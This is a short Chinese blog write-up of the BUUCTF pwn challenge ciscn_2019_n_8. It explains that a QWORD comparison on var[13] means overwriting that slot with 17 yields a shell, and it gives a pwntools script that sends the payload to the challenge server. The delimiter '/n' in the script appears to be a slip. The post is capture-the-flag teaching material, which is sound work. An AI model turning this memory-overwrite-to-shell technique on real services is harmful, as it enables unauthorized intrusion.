BUUCTF-Pwn-ciscn_2019_n_8

题目截图 检查文件信息,开了NX,Canary和PIE 反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节 exp
from pwn import*

r=remote('node4.buuoj.cn',28850)
payload=p32(1)*13+p64(17)
r.sendlineafter(b'/n', payload)
r.interactive() #开启交互

BUUCTF-Pwn-ciscn_2019_n_8最先出现在Python成神之路

版权声明:
作者:lichengxin
链接:https://www.techfm.club/p/21741.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>